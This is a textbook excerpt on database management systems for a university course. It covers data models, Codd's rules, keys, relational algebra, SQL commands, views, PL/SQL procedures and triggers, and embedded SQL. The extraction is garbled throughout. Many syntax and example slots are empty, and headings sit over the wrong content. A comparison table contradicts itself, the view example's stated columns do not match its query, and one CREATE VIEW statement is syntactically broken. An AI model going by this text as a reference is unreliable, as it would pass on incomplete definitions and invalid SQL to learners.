DBMS SMK & KP
DBMS SMK & KP
Management Systems
© Charulatha Publications
Price : Rs.375/-
CHARULATHA PUBLICATIONS
38/7, Rukmani Street,
West Mambalam, Chennai - 600 033.
Mobile : 98404 28577
Email : [email protected]
web : www.charulathapublication.com
CS3492 - DATABASE MANAGEMENT SYSTEMS
SYLLABUS
Purpose of Database System – Views of data – Data Models – Database System Architecture –
Introduction to relational databases – Relational Model – Keys – Relational Algebra – SQL
fundamentals – Advanced SQL features – Embedded SQL– Dynamic SQL
1.1. INTRODUCTION
Data
These are simply raw facts which do not carry any specific meaning. When data are
processed, interpreted, organized, structured or presented in a proper way to make them
meaningful or useful, then they are called as information.
The number of visitors to a website by country is an example of data. Finding out that
traffic from the U.S. is increasing while that from Australia is decreasing is meaningful
information.
Database
It is logically coherent collection of data with some inherent meaning, representing some
aspect of real world. It is designed, built and populated with data for a specific purpose.
It is a collection of interrelated data and a set of programs to access those data. The goal
of DBMS is to provide an environment that is both convenient and efficient to use.
MySQL, SQL Server, MongoDB, Oracle Database, PostgreSQL, Informix, Sybase, etc.
are all examples of different databases. These modern databases are managed by DBMS.
Previously, the applications were built directly on top of the file system. Keeping
organizational information in a file-processing system has a number of disadvantages as listed
below:
• Data isolation
1.2 Introduction to DBMS
• Integrity problems
• Atomicity problems
• Concurrent-access anomalies
• Security problems
The same information may be duplicated in several places (files), which is called as
redundancy. This leads to higher storage and access cost. In addition, it may lead to data
inconsistency of data i.e., various copies of the same data may no longer agree.
Example: change of student address in one file may not get reflected in another file.
The conventional file-processing environments do not allow needed data (e.g., students
who have taken 60 credit hours) to be retrieved in a convenient and efficient manner.
More responsive data-retrieval systems are required for general use.
Example: One of the bank officers want to find out the names of all customers who live
within a particular postal-code area. If there is no application program for this means,
the officer has 2 alternatives: 1. Preparing the list manually from the list of all customers.
2. Ask system programmer to write the necessary application programs.
As data are scattered in various files and files may be in different formats and these files
may be stored in different folders of different departments, writing new application
programs to retrieve the appropriate data is difficult.
The data values stored in the database must satisfy certain types of consistency
constraints. Developers enforce these constraints in the system by adding appropriate
code in various application programs. However, when new constraints are added, it is
difficult to change the programs to enforce them. The problem is compounded when
constraints involve several data items from different files. Example: The pass marks of
the student are 50.
Database Management Systems 1.3
v. Atomicity problems
For the sake of overall performance of the system and faster response, many systems
allow multiple users to update the data simultaneously. Example: Let Department A
has account balance of Rs.10,000. If two department clerks debit the amount of Rs.500
and Rs.100 from the account of department A at the same time, it will be written back
as Rs.9500 and Rs.9900 rather than the correct value of Rs.9400.
Not every user of the system should be able to access all the data. Enforcing security
constraints is difficult in file system. Example: University payroll personnel need to see
only the financial information but not the information about academic records.
Sharing of data Due to the centralized approach, data Data is distributed in many files,
sharing is easy. and it may be of different formats,
so it isn't easy to share data.
1.4 Introduction to DBMS
Data Abstraction DBMS gives an abstract view of data The file system provides the detail
that hides the details. of the data representation and
storage of data.
Security and DBMS provides a good protection It isn't easy to protect a file under
Protection mechanism. the file system.
Recovery DBMS provides a crash recovery The file system doesn't have a crash
Mechanism mechanism, i.e., DBMS protects the mechanism, i.e., if the system
user from system failure. crashes while entering some data,
then the content of the file will be
lost.
Manipulation DBMS contains a wide variety of The file system can't efficiently
Techniques sophisticated techniques to store and store and retrieve the data.
retrieve the data.
Concurrency DBMS takes care of Concurrent access In the File system, concurrent
Problems of data using some form of locking. access has many problems like
redirecting the file while deleting
some information or updating some
information.
Where to use Database approach used in large File system approach used in large
systems which interrelate many files. systems which interrelate many
files.
Cost The database system is expensive to The file system approach is cheaper
design. to design.
Data Redundancy Due to the centralization of the In this, the files and application
and Inconsistency database, the problems of data programs are created by different
redundancy and inconsistency are programmers so that there exists a
controlled.
Database Management Systems 1.5
Structure The database structure is complex to The file system approach has a
design. simple structure.
Data In this system, Data Independence In the File system approach, there
Independence exists, and it can be of two types. exists no Data Independence.
Logical Data Independence
Physical Data Independence
Integrity Integrity Constraints are easy to apply. Integrity Constraints are difficult to
Constraints implement in file system.
Data Models In the database approach, 3 types of In the file system approach, there is
data models exist: no concept of data models exists.
Hierarchal data models
Network data models
Relational data models
Flexibility Changes are often a necessity to the The flexibility of the system is less
content of the data stored in any system, as compared to the DBMS
and these changes are more easily with approach.
a database approach.
1.3. APPLICATIONS
Databases change over time as information is inserted and deleted. The collection of
information stored in the database at a particular moment is called an instance of the database.
The overall design of the database is called the database schema. Database systems have several
schemas, partitioned according to the levels of abstraction. The physical schema describes the
database design at the physical level, while the logical schema describes the database design at
the logical level. A database may also have several schemas at the view level, sometimes called
subschemas that describe different views of the database.
In general, the interfaces between the various levels and components should be well
defined so that changes in some parts do not seriously influence others.
The ability to change the schema at one level of a database system without having to
change the schema at the next higher level is called "Data Independence". There are two types
of data independence:
(1) Physical Data Independence: Physical data Independence is the ability to change the
internal schema without having to change the conceptual schema.
e.g., creating additional access structure to improve the performance of the retrieval or
update.
(2) Logical Data Independence: The logical Data Independence is the ability to change the
conceptual schema without having to change application programs (external schema).
e.g., We may change the conceptual schema to expand the database by adding a record
type or data items or reduce the database by removing data items.
Fig. 1.2 depicts the architecture of the database. It shows how different types of users
interact with a database, and how the different components of a database engine are connected
to each other. A database system is partitioned into modules that deal with each of the
responsibilities of the overall system. The functional components of a database system can be
broadly divided into
• Storage manager
• Query processor
• Users
1.8 Introduction to DBMS
Authorization and integrity manager – This tests for the satisfaction of integrity
constraints and checks the authority of users to access data
Transaction manager – This ensures that the database remains in a consistent state when
the system failures and those concurrent transaction executions proceed without
conflicting. The transaction manager consists of the concurrency-control manager and
the recovery manager.
o Recovery manager detects system failures and restore the database to the state that
existed prior to the occurrence of the failure.
File manager – This manages the allocation of storage space on disk and data structures
used to store that information.
Buffer manager – This is responsible for fetching data from disk into main memory.
The storage manager implements several data structures as part of the physical system
implementation:
Data dictionary - stores metadata about the structure of the database, in particular the
schema of the database.
Indices - can provide fast access to data items. A database index provides pointers to
those data items that hold a particular value.
Database Management Systems 1.9
DDL interpreter - interprets Data Definition Language (DDL) statements and records
the definitions in the data dictionary.
The DML compiler performs query optimization; that is, it picks the lowest cost
evaluation plan from among the various alternatives.
Users are differentiated by the way they are expected to interact with the system.
• Specialized users – write specialized database applications that do not fit into the
traditional data processing framework E.g: CAD system, knowledge based and expert
systems
• Naive users – Interact with the system by invoking one of the permanent application
programs that have been written previously. E.g: people accessing database over the
web, bank tellers, clerical staff
• Database Administrator - A person who has central control over the system is called a
database administrator (DBA). He coordinates all the activities of the database system;
the database administrator has a good understanding of the enterprise’s information
resources and needs.
Functions of a DBA include:
o Schema definition - The DBA creates the original database schema by executing a
set of data definition statements in the DDL.
o Storage structure and access-method definition
o Schema and physical-organization modification - The DBA carries out changes to
the schema and physical organization to reflect the changing needs of the
organization to improve performance.
o Granting of authorization for data access - By granting different types of
authorization, the database administrator can regulate which parts of the database
various users can access.
o Routine maintenance - Examples of the database administrator’s routine
maintenance activities are:
▪ Periodically backing up the database
▪ Ensuring that enough free disk space is available for normal operations, and
upgrading disk space as required
▪ Monitoring jobs running on the database
Database Management Systems 1.11
The DBMS interacts with the operating system when disk accesses—to the database or
to the catalog—are needed. If the computer system is shared by many users, the OS will
schedule DBMS disk access requests and DBMS processing along with other processes. On the
other hand, if the computer system is mainly dedicated to running the database server, the
DBMS will control main memory buffering of disk pages. The DBMS also interfaces with
compilers for general purpose host programming languages, and with application servers and
client programs running on separate machines through the system network interface.
The database and the DBMS catalog are usually stored on disk. Access to the disk is
controlled primarily by the operating system (OS), which schedules disk read/write. Many
DBMSs have their own buffer management module to schedule disk read/write, because this
has a considerable effect on performance. Reducing disk read/write improves performance
considerably. A higher-level stored data manager module of the DBMS controls access to
DBMS information that is stored on disk, whether it is part of the database or the catalog.
It provides a collection of tools for describing data, data relationships, data semantics
and consistency constraints. There are different types of data models.
The relational model uses a collection of tables to represent both data and the
relationships among those data as shown in Fig. 1.3. Each table has multiple columns, and each
column has a unique name. Tables are also known as relations. The relational model is an
example of a record-based model. Record-based models are so named because the database is
structured in fixed-format records of several types. Each record type defines a fixed number of
fields, or attributes. Relational model is the most widely used data model.
o Simplicity
o Structural independence
Disadvantages
The entity-relationship (E-R) data model uses a collection of basic objects, called
entities, and relationships among these objects as shown in Fig. 1.4. An entity is a “thing” or
“object” in the real world that is distinguishable from other objects. The entity-relationship
model is widely used in database design. The E-R diagram is built up from the following
components.
o Lines: which link attributes to entity sets and entity sets to relationships.
The semistructured data model permits the specification of data where individual data
items of the same type may have different sets of attributes. This is in contrast to the data models
mentioned earlier, where every data item of a particular type must have the same set of
attributes. JSON and Extensible Markup Language (XML) are widely used semi-structured data
representations.
Object-oriented programming (especially in Java, C++, or C#) has become the dominant
software-development methodology. This led initially to the development of a distinct object-
oriented data model, but today the concept of objects is well integrated into relational databases.
Standards exist to store objects in relational tables. This can be seen as extending the relational
model with notions of encapsulation, methods, and object identity.
CHAPTER – II
RELATIONAL DATABASES
2.1.1 Introduction
The term relation instance refers to a specific instance of a relation containing a specific
set of rows. The instance of instructor shown in Fig 2.1 has 2 tuples, corresponding to 2
instructors.
For each attribute of a relation, there is a set of permitted values, called the domain of
that attribute. Thus, the domain of the salary attribute of the instructor relation is the set of all
possible salary values, while the domain of the name attribute is the set of all possible instructor
names.
2.2 Relational Database
For all relations r, the domains of all attributes of r be atomic. A domain is atomic if
elements of the domain are considered to be indivisible units. For example, suppose the table
instructor had an attribute phone number, which can store a set of phone numbers corresponding
to the instructor. Then the domain of phone number would not be atomic, since an element of
the domain is a set of phone numbers, and it has subparts, namely, the individual phone numbers
in the set.
The null value is a special value that signifies that the value is unknown or does not
exist. For example, suppose as before that we include the attribute phone number in the
instructor relation. If an instructor does not have a phone number at all, use the null value to
signify that the value does not exist.
Database schema is the logical design of the database, and the database instance is a
snapshot of the data in the database at a given instant in time. In general, a relation schema
consists of a list of attributes and their corresponding domains.
Dr Edgar F. Codd, after his extensive research on the Relational Model of database
systems, came up with twelve rules of his own, which according to him, a database must obey
in order to be regarded as a true relational database. These rules can be applied on any database
system that manages stored data using only its relational capabilities. This is a foundation rule,
which acts as a base for all the other rules.
The data stored in a database, may it be user data or metadata, must be a value of some
table cell. Everything in a database must be stored in a table format.
The NULL values in a database must be given a systematic and uniform treatment. This
is a very important rule because a NULL can be interpreted as one the following − data is
missing, data is not known, or data is not applicable.
Database Management Systems 2.3
The structure description of the entire database must be stored in an online catalog,
known as data dictionary, which can be accessed by authorized users. Users can use the same
query language to access the catalog which they use to access the database itself.
A database can only be accessed using a language having linear syntax that supports
data definition, data manipulation, and transaction management operations. This language can
be used directly or by means of some application. If the database allows access to data without
any help of this language, then it is considered as a violation.
All the views of a database, which can theoretically be updated, must also be updatable
by the system.
A database must support high-level insertion, updation, and deletion. This must not be
limited to a single row, that is, it must also support union, intersection and minus operations to
yield sets of data records.
The data stored in a database must be independent of the applications that access the
database. Any change in the physical structure of a database must not have any impact on how
the data is being accessed by external applications.
The logical data in a database must be independent of its user’s view (application). Any
change in logical data must not affect the applications using it. For example, if two tables are
merged or one is split into two different tables, there should be no impact or change on the user
application. This is one of the most difficult rules to apply.
A database must be independent of the application that uses it. All its integrity
constraints can be independently modified without the need of any change in the application.
This rule makes a database independent of the front-end application and its interface.
2.4 Relational Database
The end-user must not be able to see that the data is distributed over various locations.
Users should always get the impression that the data is located at one site only. This rule has
been regarded as the foundation of distributed database systems.
If a system has an interface that provides access to low-level records, then the interface
must not be able to subvert the system and bypass security and integrity constraints.
2.2. KEYS
A key allows us to identify a set of attributes and thus distinguishes entities from each
other. Keys also help to uniquely identify relationships, and thus distinguish relationships from
each other. Different types of keys are:
• Super key
• Primary key
• Candidate key
• Foreign key
A super key is a set of one or more attributes that, taken collectively, that allows us to
identify uniquely a tuple in the relation.
e.g., {Roll-No}, {Roll-No, Name}, {Roll-No, Address}, {Roll-No, Name, Address} all
these sets are super keys.
A primary key is one or more column(s) in a table used to uniquely identify each row in
the table. Primary key cannot contain Null value.
If a relational schema has more than one key, each is called a candidate key. All the
keys which satisfy the condition of primary key can be candidate key. In a student relation,
{Roll-No} and {Phone-No} are two candidate keys and we can consider anyone of these as a
primary key.
Database Management Systems 2.5
Foreign keys are used to represent relationships between tables. An attribute in one
relation whose value matches the primary key in some other relation is called a foreign key.
In the above relations, for dept relation dno is the primary key, for employee relation
eno is the primary key and here we can find that the employee relation - dno matches with the
dept relation – dno. So here employee relation dno is known as foreign key.
Referential integrity ensures that a value in one table references an existing value in
another table. The rule of referential integrity states that the value of a foreign key must be
within the domain of its related primary key, or it must be null. This relationship ensures that:
• Records cannot be inserted into a detail table if corresponding records in the master table
do not exist.
• Records of the master table cannot be deleted if corresponding records in the detail table
exist.
Relational database systems are expected to be equipped with a query language that can
assist its users to query the database instances. There are two kinds of query languages −
relational algebra and relational calculus. Relational algebra is a procedural query language.
Relational calculus is a non-procedural or declarative query language. Relational Algebra
targets how to obtain the result. Relational Calculus targets what result to obtain. Here we will
discuss in detail about relational algebra.
r ∪ s = {t | t ∈ r or t ∈ s}
Notation − r U s where r and s are either database relations or relation result set (temporary
relation). In the result, duplicate tuples are automatically eliminated.
Output − Projects the names of the authors who have either written a book or an article or both.
The result of this operation is set of tuples that are present in one relation but not in the second
relation.
Notation: r – s where r and s are relations. It finds all the tuples that are present in r but not in
s.
Output − Provides the name of authors who have written books but not articles.
This operation is used to combine information in two different relations into one.
Notation: r Χ s where r and s are relations and their output will be defined as –
r Χ s = {q t | q ∈ r and t ∈ s}
The cardinality of the Cartesian product is the product of the cardinalities of its factors, that is,
|R × S| = |R| × |S|.
Output - Yields a relation that shows all the books and articles written by Elmasri.
The results of relational algebra are also relations but without any name. The rename
operation allows us to name the output relation. 'rename' operation is denoted with small Greek
letter ρ.
1. Set intersection
2. Division
3. Natural join
4. Assignment
Additional operations are defined in terms of the fundamental operations. They do not
add power to the algebra, but are useful to simplify common queries.
Set Intersection
Intersection on two relations R1 and R2 can only be computed if R1 and R2 are union
compatible (These two relations should have same number of attributes and corresponding
Database Management Systems 2.9
attributes in two relations should have same domain). Intersection operator, when applied to
two relations as R1∩R2, will give a relation with tuples which are in R1 as well as R2.
Student ∩ Employee
In terms of basic operators (union and minus), intersection can be expressed as follows:
The relation returned by division operator will return those tuples from relation A which
are associated to every B’s tuple.
Student_Sports Table
ROLL_NO SPORTS
1 Badminton
2 Cricket
2 Badminton
4 Badminton
2.10 Relational Database
All_Sports Table
SPORTS
Badminton
Cricket
The tuples in resulting relation will have those ROLL_NO which are associated with all
B’s tuple {Badminton, Cricket}. ROLL_NO 1 and 4 are associated to Badminton only.
ROLL_NO 2 is associated to all tuples of B. So, the resulting relation will be:
ROLL_NO
Join Operation
Cartesian product of two relations gives us all the possible tuples that are paired
together. But it might not be feasible for us in certain cases to take a Cartesian product where
we encounter huge relations with thousands of tuples having a considerable large number of
attributes without any meaningful inference.
Types of joins
Theta join combines tuples from different relations that satisfy theta condition. The join
condition is denoted by the symbol θ.
Notation: R1 ⋈θ R2 where R1 and R2 are relations having attributes (A1, A2, ..., An)
and (B1, B2, ... ,Bn) such that the attributes don’t have anything in common, that is R1 ∩ R2 =
Φ. Theta join can use all kinds of comparison operators.
Student table
101 Alex 10
102 Maria 11
Subject table
Class Subject
10 Math
10 English
11 Music
11 Sports
Applying the operation, Student ⋈Student.Std = Subject.Class Subject, we get the output as
• Equijoin
When Theta join uses only equality comparison operator, it is said to be equijoin. The
above example corresponds to equijoin.
Natural join does not use any comparison operator. It does not concatenate the way a
Cartesian product does. We can perform a Natural Join only if there is at least one
common attribute that exists between two relations. In addition, the attributes must have
the same name and domain. Natural join acts on those matching attributes where the
values of attributes in both the relations are same.
Courses Table
CS01 Database CS
ME01 Mechanics ME
EE01 Electronics EE
HoD Table
Dept Head
CS Alex
ME Maya
EE Mira
• Outer Joins
Theta Join, Equijoin, and Natural Join are called inner joins. An inner join includes only
those tuples with matching attributes and the rest are discarded in the resulting relation.
Therefore, we need to use outer joins to include all the tuples from the participating
relations in the resulting relation. There are three kinds of outer joins − left outer join,
right outer join, and full outer join.
Consider the tables Left and Right for explaining the concept:
Left
A B
100 Database
101 Mechanics
102 Electronics
Right
A B
100 Alex
102 Maya
104 Mira
2.14 Relational Database
All the tuples from the Left relation, R, are included in the resulting relation. If there are
tuples in R without any matching tuple in the Right relation S, then the S-attributes of
the resulting relation are made NULL.
A B C D
A B C D
A B C D
Assignment Operation
Sometimes it is useful to be able to write a relational algebra expression in parts using
a temporary relation variable. The assignment operation, denoted as , works like assignment
in a programming language. No extra relation is added to the database, but the relation variable
created can be used in subsequent expressions. Assignment to a permanent relation would
constitute a modification to the database.
CHAPTER – III
SQL FUNDAMENTALS
3.1 INTRODUCTION
IBM Sequel language was developed as part of System R project at the IBM San Jose
Research Laboratory. Afterwards it has been renamed as Structured Query Language (SQL).
SQL is the standard command set used to communicate with the relational database
management systems. All tasks related to relational data management - creating tables, querying
the database can be done using SQL.
• Portable.
• numeric (p, d): a fixed-point number with user-specified precision, consists of p digits
and d of p digits after decimal point.
• date: a calendar date, containing four-digit year, month, and day of the month.
ADD A COLUMN
Syntax:
alter table table_name add column_name datatype(size);
Example:
alter table student add column mark1 int;
DROP A COLUMN
This command is used to delete a column.
Syntax:
alter table table_name drop column_name ;
Example:
SQL>alter table student drop column mark1;
MODIFY COLUMN
This command is used to change the data type of a column or change the size of the
column
Syntax:
ALTER TABLE table_name MODIFY COLUMN column_name datatype;
Example:
alter table student modify name varchar2(25);
ADD PRIMARY KEY
This command is used to make a column as primary key.
Syntax:
alter table table_name add primary key(Field_name);
Example:
alter table student add primary key(Rollno);
DROP PRIMARY KEY
This command is used to remove the primary key.
Syntax:
alter table table_name drop primary key;
Example:
3.4 SQL Fundamentals
Example:
SELECT ROLL_NO, NAME from Student;
b) SELECT with Condition
Selecting all columns satisfying some condition:
Syntax:
SELECT * FROM Table_name where condition;
Example:
SELECT * from Student where NAME='Tina';
Selecting particular columns satisfying some condition:
Syntax:
SELECT Column1, Column2, Column3… FROM Table_name where condition;
Example:
SELECT ROLL_NO from Student where NAME='Tina';
iii. UPDATE
This command is used to modify the data in existing database row(s). Usually, a
conditional clause is to be added to specify which row(s) are to be updated. If conditional
clause is not included, then updation will be done in all the rows.
Syntax:
Example:
iv. DELETE
This command deletes a single record or multiple records from a table. If commit
command is not executed, then the deleted rows can be retrieved using rollback
command.
Syntax:
Database Management Systems 3.7
Example:
Syntax:
Example:
DCL commands are used to control the access to data stored in a database. It ensures
security.
• GRANT
• REVOKE
i) GRANT
Syntax:
Example:
ii) REVOKE
This command is used to get back the permission from the users.
Syntax:
3.8 SQL Fundamentals
Example:
Transaction is a set of tasks grouped into a single execution unit. TCL commands are
used to maintain consistency of the database and management of transactions made by the DML
commands. The following TCL commands are used to control the execution of a transaction:
• COMMIT
• ROLLBACK
• SAVEPOINT
i. COMMIT:
This command is used to save the data permanently.
Syntax:
commit;
ii. ROLLBACK
This command is used to restore the data to the last savepoint or last committed state.
Syntax:
rollback;
iii. SAVEPOINT
This command marks a point in the current transaction. This command is used to save
the data at a particular point temporarily, so that whenever needed can be rollback to
that particular point.
Syntax:
Example:
1. String Operations
• select name from customer where name like 'S% '; //Displays the name of the
2. Order by Clause
The ORDER BY keyword is used to sort the result of the query in ascending or
descending order. By default, the ORDER BY keyword sorts the records in ascending
order and DESC keyword should be used to sort the records in descending order.
Syntax:
Examples:
• List all customer details in the Customer table, sorted ascending by city name and
then descending by the CustomerName
3. Set Operations
SQL Set operation is used to combine the data from the result of two or more SELECT
commands. The number of columns retrieved by each SELECT command must be the
same. The columns in the same position in each SELECT statement should have
similar data types.
i. Union:
The UNION operator returns the rows either from the result set of first query or
result set of second query or both. The union operation eliminates the duplicate rows
from its result set.
Syntax:
Example:
Syntax:
Example:
SELECT acctno from Account UNION ALL SELECT acctno from Loan;
Database Management Systems 3.11
iii. Intersect:
The Intersect operation returns the common rows from the result set of both
SELECT statements. It has no duplicates and it arranges the data in ascending order
by default.
Syntax:
Example:
iv. Minus:
Minus operator is used to display the rows which are present in the result set of first
query but not present in the result set of second query. It has no duplicates and data
arranged in ascending order by default.
Syntax:
Example:
4. NULL values
A NULL signifies an unknown value or that a value does not exist. For example, the
value for the field phone number is NULL, if the person does not have phone or the
person has the phone but we do not know the phone number. Hence it is possible for
tuples to have a null value for some of their attributes denoted by NULL.
The result of any arithmetic expression involving null is null [5 + null returns null]. The
predicate is null can be used to check for null values. For example, the following query
displays the name of the employees whose salary is null.
The following table shows the aggregate functions and the result of the queries.
GROUP BY is used to group to all the records in a relation together for each and
every value of a specific key(s) and then display them for a selected set of fields the
relation.
Syntax:
Example:
The HAVING clause is used to group the records together based on the key and
apply some condition on that group. The HAVING clause must follow the GROUP
BY clause in a query and must also precedes the ORDER BY clause if used.
Syntax:
GROUP BY column_name
Example:
A Sub query or Inner query or a Nested query is a query within another SQL query and
embedded within the WHERE clause. A sub query is used to return data that will be used in the
main query as a condition. Sub queries must be enclosed within parentheses. Sub queries cannot
have an ORDER BY command but the main query can use an ORDER BY.
Syntax:
i) Set Membership
Example:
select projectid from emp_proj where empid in (select empid from employee where
empname = 'John');
select projectid from emp_proj where empid not in (select empid from employee
where empname = 'John');
SQL supports various comparison operators such as < =, > =, < >, any, all, some, etc. to
compare sets.
Example:
▪ Display the name of employees whose salary is greater than that of some (at least
one) employees in the manufacturing department.
The above query can also be written using > some clause as shown below.
select name from Employee where salary > some (select salary from Employee
where deptname = ' manufacturing ');
▪ Display the name of employees whose salary is greater than the salary of all
employees in the manufacturing department.
select name from Employee where salary > all (select salary from Employee where
deptname = ' manufacturing ');
SQL includes the facility for testing whether the result set of sub query has any tuples.
The exists in SQL returns the value true if the result of sub query is nonempty.
Database Management Systems 3.15
Example
▪ List the courseid of the courses registered by one or more students.
SELECT DISTINCT courseid FROM course WHERE EXISTS (SELECT * FROM
stud_course WHERE course.courseid = stud_course.courseid)
Similarly, the NOT EXISTS in SQL Server will check the subquery for rows
existence, and if there are no rows then it will return TRUE, otherwise FALSE.
▪ List the courseid of the courses not chosen by any student.
SELECT DISTINCT courseid FROM course WHERE NOT EXISTS (SELECT *
FROM stud_course WHERE course.courseid = stud_course.courseid)
iv) Test for absence of duplicate tuples
The unique construct tests whether a sub query has any duplicate tuples in its result. The
unique construct evaluates to “true”, if a given sub query contains no duplicates.
Example:
▪ Find all courses that were offered at most once in 2017
select T.course_id from course as T where unique (select R.course_id from section
as R where T.course_id= R.course_id and R.year = 2017);
3.7. VIEWS
In many applications, it is not desirable for all users to see the entire relation.
Security considerations require that a part of the relation can be made available to the users
and certain data need to be hidden from them. For example, a clerk may be given the rights
to know an instructor’s ID, name and department name and instructor’s salary. This person
should see a relation described in SQL, by:
select ID, name, dept name from instructor;
It is possible that the result set of above queries can be computed and stored in another
relation and that stored relation can be given to the clerks. However, if the underlying data in
the relation instructor changes, the stored query results would then no longer match the result
of re-executing the query on the relations.
In order to overcome the above issue, SQL allows a “virtual relation” to be defined
by a query, and the relation conceptually contains the result of the query. The virtual
relation is not pre-computed and stored, but instead computed by executing the query
whenever the virtual relation is used. Any such relation that is not part of the logical model,
but is made visible to a user as a virtual relation, is called a view.
3.16 SQL Fundamentals
i. View Definition
A view in SQL can be created using the create view command. To define a view, we
must give the view a name and must state the query that computes the view.
Syntax:
Example:
Let us consider the EMP relation contains the fields empno, ename and job. The below
command creates a view named v1 with the details of clerks only.
CREATE VIEW v1 AS SELECT empno, ename, FROM EMP WHERE job = ‘clerk’;
The view relation conceptually contains the tuples in the query result and not pre
computed or saved. But the database system stores the query expression associated
with the view relation. Whenever the view relation is accessed, its tuples are created
by computing the query result.
Once we have defined a view, we can use the view name to refer to the virtual relation
that the view generates. Using the view v1, we can find the empno of all clerks.
View names may be used in a way similar to using a relation name. Certain database
systems allow view relations to be stored, but they make sure that, if the actual relations
used in the view definition change, the view is kept up-to-date. Such views are called
materialized views.
Although views are a useful tool for queries, they present serious problems if we
express updates, insertions, or deletions with them. The difficulty is that a
modification to the database expressed in terms of a view must be translated to a
modification to the actual relations in the logical model of the database.
Suppose the view v1 is made available to a clerk. Since we allow a view name to appear
wherever a relation name is allowed, the clerk can write:
This insertion must be represented by an insertion into the relation EMP, since
Database Management Systems 3.17
EMP is the actual relation from which the view v1 is created. However, to insert a tuple
into Employee, we must have some value for job. There are two reasonable approaches
to deal with this insertion:
3.8. JOINS
The Join clause is used to combine records from two or more tables in a database.
Cartesian product of two relations results in all possible combination whereas Join combines
the tables by using common values. Join is equivalent to Cartesian product followed by a
selection process. A Join operation pairs two tuples from different relations, if and only if a
given join condition is satisfied. We have discussed the types of joins already. (Refer Section
2.3.2)
create table student(rollno int primary key, sname varchar(25), class varchar(10));
3.9.1 Functions
Syntax
A function consists of a header and body. The function header has the function name
and a RETURN clause that specifies the data type of the value to be returned. The parameter of
the function can be either in the IN, OUT, or INOUT mode.
Among the three sections, only the executable section is required, the others are optional.
Example:
The following example illustrates how to create and call a function. Let us consider the
Sportsman relation contains the following data.
Database Management Systems 3.19
The below function creates a function that returns the id of the sportsman, if name is
given.
3.9.2 Procedures
The PL/SQL stored procedure or simply a procedure is a PL/SQL block which performs
one or more specific tasks. It is just like procedures in other programming languages.
Header: The header contains the name of the procedure and the parameters or variables passed
to the procedure.
Body: The body contains a declaration section, execution section and exception section
similar to a general PL/SQL block.
1. IN parameters: The IN parameter can be referenced by the procedure but the value of
the parameter cannot be overwritten.
2. OUT parameters: The OUT parameter cannot be referenced but the value of the
parameter can be overwritten.
3. INOUT parameters: The INOUT parameter can be referenced the value of the
parameter can be overwritten. The main difference between procedure and a function is,
a function must always return a value, but a procedure may or may not return a value.
Syntax
CREATE [OR REPLACE] PROCEDURE procedure_name
[ (parameter [,parameter]) ]
IS
[declaration_section]
BEGIN
executable_section
[EXCEPTION
exception_section]
END [procedure_name];
Database Management Systems 3.21
Example:
In this example, a procedure is created to insert record in the product table. So, we need
to create product table first.
create table product(id number(10) primary key,name varchar2(100));
The below procedure is to insert record in product table.
create or replace procedure proc1(id IN NUMBER, name IN VARCHAR2)
is
begin
insert into product values(id,name);
end;
The below code calls the procedure proc1and inserts the row in the product table.
BEGIN
proc1(101,'Harddisk');
END;
The syntax for deleting a procedure is
DROP PROCEDURE procedure_name;
3.9.3 Triggers
▪ Modify table data when DML statements are issued against views
3.22 SQL Fundamentals
The trigger_name must be unique for triggers in the schema. A trigger cannot be invoked
directly like function or procedure. It will be invoked automatically by its triggering event. A
trigger can be made to execute before/after the operations such as insert/update/delete.
Example:
The following trigger displays the total balance in the bank whenever a new account is
created.
declare a int;
begin
select sum(Balance) into a from Account;
dbms_output.put_line(a);
end;
Triggers can serve in many useful purposes like banking and railway reservation.
Triggers should be written with much care since the action of one trigger can invoke another
and may even lead to an infinite chain of triggering. Hence triggers can be avoided
whenever alternatives exist. Many trigger applications can be substituted by appropriate
use of stored procedures.
SQL can be embedded in almost all high-level languages due to the vast support it has
from almost all developers. Languages like C, C++, Java etc, support SQL integration. Some
languages like python have inbuilt libraries to integrate the database queries in the code. For
python, we have the SQLite library which makes it easy to connect to the database using the
embedding process.
Embedded SQL provides a means by which a program can interact with a database
server. However, under embedded SQL, the SQL statements are identified at compile time
using a preprocessor, which translates requests expressed in embedded SQL into function calls.
At runtime, these function calls connect to the database using an API that provides dynamic
SQL facilities but may be specific to the database that is being used.
Embedded SQL gives us the freedom to use databases as and when required. Once the
application we develop goes into the production mode several things need to be taken care of.
We need to take care of a thousand things out of which one major aspect is the problem of
authorization and fetching and feeding of data into/from the database. With the help of the
embedding of queries, we can easily use the database without creating any bulky code. With
the embedded SQL, we can create API’s which can easily fetch and feed data as and when
required.
For using embedded SQL, we need some tools in each high-level language. In some
cases, we have inbuilt libraries which provide us with the basic building block. While in some
cases we need to import or use some packages to perform the desired tasks.
3.24 SQL Fundamentals
For example, in Java, we need a connection class. We first create a connection by using
the connection class and further we open the connection bypassing the required parameters to
connect with the database.
The distinction between an SQL statement and host language statement is made by using
the key word EXEC SQL; thus, this key word helps in identifying the Embedded SQL
statements by the pre-compiler.
Class.forName(“com.mysql.jdbc.Driver”);
After creating the connection using the statement, we can create SQL query and execute it using
the connection object.
Host variables
• Database manager cannot work directly with high level programming language
variables.
• Instead, it must be special variables known as host variables to move data between an
application and a database.
Small footprint database: As embedded SQL uses an Ultra Lite database engine
compiled specifically for each application, the footprint is generally smaller than when using
an Ultra Lite component, especially for a small number of tables. For a large number of tables,
this benefit is lost.
High performance: Combining the high performance of C and C++ applications with
the optimization of the generated code, including data access plans, makes embedded SQL a
good choice for high-performance application development.
Database Management Systems 3.25
Extensive SQL support: With embedded SQL you can use a wide range of SQL in your
applications.
Knowledge of C or C++ required: If you are not familiar with C or C++ programming,
you may wish to use one of the other Ultra Lite interfaces. Ultra Lite components provide
interfaces from several popular programming languages and tools.
Complex development model: The use of a reference database to hold the Ultra Lite
database schema, together with the need to pre-process your source code files, makes the
embedded SQL development process complex. The Ultra Lite components provide a much
simpler development process.
SQL must be specified at design time: Only SQL statements defined at compile time
can be included in your application. The Ultra Lite components allow dynamic use of SQL
statements.
Dynamic SQL, unlike embedded SQL statements, are built at the run time and placed
in a string in a host variable. The created SQL statements are then sent to the DBMS for
processing. Dynamic SQL is generally slower than statically embedded SQL as they require
complete processing including access plan generation during the run time.
Dynamic SQL is a programming technique that allows you to construct SQL statements
dynamically at runtime. It allows you to create more general purpose and flexible SQL
statement because the full text of the SQL statements may be unknown at compilation. For
example, you can use the dynamic SQL to create a stored procedure that queries data against a
table whose name is not known until runtime.
• The query can be entered completely as a string by the user or s/he can be suitably
prompted.
• The query can be fabricated using a concatenation of strings. This is language dependent
in the example and is not a portable feature in the present query.
• The query modification of the query is being done keeping security in mind.
• The query is prepared and executed using a suitable SQL EXEC command.
CHAPTER – IV
